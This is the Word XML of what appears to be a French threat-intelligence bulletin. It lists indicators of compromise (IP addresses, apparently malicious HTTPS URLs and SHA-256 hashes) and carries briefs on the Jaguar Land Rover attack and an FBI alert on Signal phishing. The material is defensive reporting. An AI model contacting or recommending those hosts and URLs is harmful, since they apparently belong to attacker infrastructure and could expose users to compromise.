            <wp:docPr id="4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276789b3b946753e9be482219bc4526da2da8772701f3b9d00c74038e2604ece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9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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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5d164b6d74dae9fe3022bc3cf453cd8b846e9cdc0cd616246fe620be88e3f1e5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0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3255668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="951335" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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133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IOC originaux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1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3530623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="866213" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2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Adresses IP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2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3799470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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136.0.141.237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3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3976000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2592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151.158.1.229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4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4152530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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87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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">142.111.194.73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5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4786653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1246477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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64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Noms de domaine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6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5049390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2969713" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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971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https://151.158.1.229:11861/AHH_bY/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7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5219570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3053533" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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353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https://136.0.141.237:8942/seqOhyMc/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8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5389750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3304993" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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499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https://142.111.194.73:8640/dj5FZEiLnA/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9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5559930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2969713" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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971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https://151.158.1.229:11861/AHH_bY/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0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5730110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3388813" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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88813" cy="1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49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https://142.111.194.73:8640/UxodXtcg9nm/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1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6187463</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="602180" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1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Fichiers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2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6456310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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35de98f9e0d48125965d57480e6477118eb0050502bbdb764166ffa2c1e3a626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3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6632840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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9a5b6f96c531eb3521c5c1046d20f9f6fe88614dc51eb2c1c972d947897ac5bd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4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6809370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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58181a2f73a23e337087d54fa43cd86aea655823cc37f1671caf024d8b8c60d7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5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6985900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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26b61a770442f7e2d2f6d1294469eb1a76bbaf0336c356e3eab7968b70c97988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7162430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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e2715c6abc53d1f46d2bb8855dff8cddc6c748281ddf4f0869c3c8bf7108ae56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7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7338960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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af5124a73e69670fda2b8cfac1c747c91830b9aa5da64d7c06fa231545b4e375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8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7515490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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ca304fcff245603ef1329b9230ab91aa4e0edeb90b147770e802d9eee69dcbd8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9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7692020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6c416dea922dab579ec4dfaddeb6e1ee4bebed92aa6dbf8cc38be0e489bbd602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0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7868550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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65c97f49c32eb9f5281f261e271fe7565f8b0d2fab59f1bf8638e91e8334b132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1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8045080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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24520d4654a04a4605a9ce84341bf35ec2072a1e7f669bc0212f22783ff49565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2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8221610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1f5c3f4877f79b03a978d853b7a74dc5522413def61bac9960ca648765992488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3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8398140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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5bde73f076171dddfadd3c9587043bb1d8e3bed11a79a020eface0a73808e38c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4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8574670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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abe093fa53e9808884a252cc0a0947e4b4a30f1399caf128d1fbebc784871d57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6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8751200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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05e131555faabae0960f0527cfb72d2b8e2381fd0fde22b0b4e2b365c7faf445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7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8927730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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420f1931af9b3f7d02c5edfc78eb69abdad6e71d2c3e9b81f9cbc3823a503654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8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9104260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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dc4c906e56ecb446cbb10b227e1fb470e428108584678314533d80e52a2b9b30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9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9280790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6b7e3dd5af5a56dd24e96c5b13282ad084c78d0a589d5e4c1b6ba58b4525d9a8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0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9457320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3006a6639eff677b08595927cf219a3bcd5fdd02bfd592606316bfd4623bb902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11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4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216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49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318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49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420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49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523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49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41625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49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728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49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8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954670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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78538f945a1d20aa392f3065f222223a4ed47284abfafa8c135bdfd9eacef222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9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1131200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">0a9bc91e7ea2c3931f662eea37c00c7c26c8996b65f6f7afe6cce8f6114f94b6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0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1307730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="49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cbe89fda7f44265ebc0cf7a0300a3ca5d68225161c22a29ff196d85b8ca12962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1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1484260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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efeac2aa183051eaad9c092c273488c9d4bff8200b8b16952a4e68f10f0eda2d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2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1660790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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583754e5e682ea83d58fbf76ea5c82ea0f2ab5db06e9e52343c4d52f35f0a4a6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3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1837320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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e7aa24a7ab391d1551bc3d942e945cb96beea9679d87f127b77268590734bc34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4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2013850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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7dfaaac8d7759d47ef94b28501f5e4dd33a302fe54c69431673d5e0dd7f7ac43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5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2190380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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7e3a6699cf42820b40dce9bf607601c74777f2cd4134c826bc6bb1c3c6da9a19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6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2366910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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2f70b8b06120e086e65a334738e867fea2071dcf447c9fcca8c62eec81d5df6d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7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2543440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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39dd1bd3bccc314d8933e5c41ed2ab084e4e20af569f77b7cf09abc5855b9483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8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2719970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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2add9429d2822ae0c01c08bbd66c3a110ef2e9c3a00cded1477657e9024e391e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9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2896500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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ad6071a44089df433f23a7dcd17fc4c49b67521d40f600bad875e2b1e312c8e0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0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3073030</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">fcbeef11f392809cf96cceb94055f33b1f0fde94a4e3ee9223a01fcf55e9f0e0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1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3249560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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aa8a0dc974e090ae6f0a9cf90096646514b9c178ec8119ec211df2cb106f681e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2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3426090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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cb65f5873c72d707371ec56fb8ba501a5c7f5940e9c5a2d28c9b379ce216900c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3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3602620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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f722ee8333f609e3589ec15acc3f000f99106a82d39260108ee4fe9c5e235cd2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4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3779150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">73f59cecb1e650ab35ee7363b0118b419318c0410469e5750f80706d5b08a01b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5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3955680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1ebbdf3671cd5ca25a8a8e7ca2f6e46dd22c631e01bfcc5c909ae2fd680bf458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6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4132210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1c90a1ce25b5078cea3e1c6aaed4f2e1727aa54fdd3c4a12d57afc085f1fcff9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7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4308740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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b86f8beec09529afaa8dc89bf0a0e1afd21a2be2d250281f42a28709a0733ac2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8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4485270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">2760fdddbb85327775542e8314e08aa455905d2a44a2a46871c76ab98e29a36a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9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4661800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">7d5f786eaaf1f8b1ea8dc12e17d16764e6424797d0e4bed05f87843aeddb32be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0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4838330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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2935" cy="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7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23"/>
                          </w:rPr>
                          <w:t xml:space="preserve">aa9505993e2171db4324ba5b7e651ef8ec524379d8e269c7acad1975fb6f8e7f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185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0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2880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0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39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0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492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0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595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45414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8705224</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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5168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0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6192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7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948084</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5320181" cy="233660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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0181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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">[Brève] Des pirates informatiques russes seraient à l'origine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8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1200814</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5468721" cy="233660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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8721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d'une cyberattaque de 2,5 milliards de dollars contre Jaguar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9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1453544</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2665170" cy="233660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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5170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Land Rover, selon un rapport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0288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2095523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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23 septembre</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle5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2025</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle5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: Une cyberattaque a contraint JLR à interrompre sa production,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1312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2268878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3863909" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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390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et cette interruption se poursuivra au moins jusqu'en octobre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233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2543833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">17 octobre 2025</w:t>
                        </w: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: Estimation des pertes financières causées par la cyberattaque,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3360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2717188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5378968" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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89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réalisée par le Cyber Monitoring Center, un organisme indépendant à but non lucratif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438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2890543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2338639" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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863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composé de spécialistes du secteur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5408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3165498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606298" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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2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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">5 janvier 2026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 : JLR publie ses chiffres de ventes en gros et au détail pour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6432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3349648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5129464" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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2946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troisième trimestre de l'exercice 2026 et démontrent l’ampleur de la cyberattaque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745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3622698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">26 juin 2026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: Publication de l’investigation sur l’incident par le New York Times,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8480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3796053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2618039" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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803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collaboration avec Mandiant et Palo Alto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9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4345963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="656568" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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Synthèse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0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4620918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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L’année dernière, des hackers ont attaqué le géant automobile Jaguar Land Rover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45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, l’un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1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4805068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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plus grands employeurs du Royaume-Uni. Cette cyberattaque a paralysé la production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2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4989218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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pendant des mois et a porté un coup à l’économie du pays. Les dégâts ont été si importants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3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5173368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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que le gouvernement britannique a décidé de renflouer l’entreprise à hauteur de 1,5 milliard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4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5357518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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 livres sterling (environ 2 milliards de dollars), et selon les estimations, cette cyberattaque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5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5541668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3784127" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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8412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aurait coûté 2,5 milliards de dollars à l’économie britannique.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6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5814718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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Pendant des mois, les spéculations allaient bon train quant à l’identité des auteurs.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7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5988073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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Aujourd’hui, citant des sources proches de l’enquête, le New York Times rapporte que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8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6161428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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pirates à l’origine de cette intrusion étaient russes, même s’il n’est pas encore clair s’ils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9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6334783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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travaillaient directement pour le gouvernement de Vladimir Poutine, s’il s’agissait simplement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0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6508138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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de criminels, ou d’une situation intermédiaire, comme des criminels agissant avec l’accord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1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6681493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1534119" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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411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tacite du gouvernement.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28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6956448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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Microsoft surveillait ce groupe de pirates russes et a transmis à JLR des informations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3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7129803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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concernant l’identité des pirates, rapporte le New York Times. Toutefois, certaines sources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4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7303158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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ont également indiqué que le FBI, l’Agence nationale britannique contre la criminalité (NCA)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58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7476513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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et le Centre national de cybersécurité (NCSC), la division Mandiant de Google, ainsi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69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7649868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3334153" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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341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Palo Alto Networks avaient tous participé à l’enquête.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79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7924823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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Fait rare, mais pas sans précédent dans le monde de la cybersécurité, il s'est avéré que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89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8098178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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groupe de pirates russes n'était pas le seul à avoir pénétré dans certains réseaux de JLR.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99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8743337</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4400841" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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084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41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https://media.jaguarlandrover.com/news/2025/09/statement-cyber-incident-4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10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8889387</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5516536" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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653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42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https://cybermonitoringcentre.com/2025/10/22/cyber-monitoring-centre-statement-on-the-jaguar-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20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9035437</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2222537" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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22537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land-rovercyber-incident-october-2025/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30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9181487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565431" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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543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43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https://media.jaguarlandrover.com/news/2026/01/jlr-q3-sales-impacted-cyber-incident-previously-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40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9327537</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="543892" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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89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indicated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51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4316386" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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638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44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https://www.nytimes.com/2026/06/26/world/europe/jaguar-russia-hack.html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6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5494946" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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494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45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https://techcrunch.com/2025/09/10/jaguar-land-rover-says-data-stolen-in-disruptive-cyberattack/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715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0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817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0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0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0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022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0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124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0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50227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0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329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0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4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50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Un pirate jordanien se faisant appeler Rey s'était également introduit dans ces réseaux,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5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1618498" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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84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selon le New York Times.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63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0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73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0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84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0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94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0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1046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0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517632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8851274</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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18656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0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19680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0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0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947310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5376507" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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6507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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">[Brève] Le FBI met en garde : des pirates informatiques des services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1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1198770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5598808" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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98808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renseignement russes ciblent les clés de récupération des sauvegardes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2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1450230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="498712" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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8712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Signal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3776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2091713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">20 mars 2026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: Le FBI lance une alerte après la confirmation du piratage de milliers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4800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2265068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1274379" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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437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comptes Signal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5824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2540023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">26 juin 2026</w:t>
                        </w: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 : Mise à jour de l’alerte de mars 2026 par la FBI à propos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6848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2713378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2727259" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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725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opérations de phishing menées sur Signal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7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3263288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="656568" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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Synthèse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8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3538243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="50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Le FBI et la CISA ont mis à jour leur alerte de mars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48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concernant les opérations de phishing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99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3722393</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
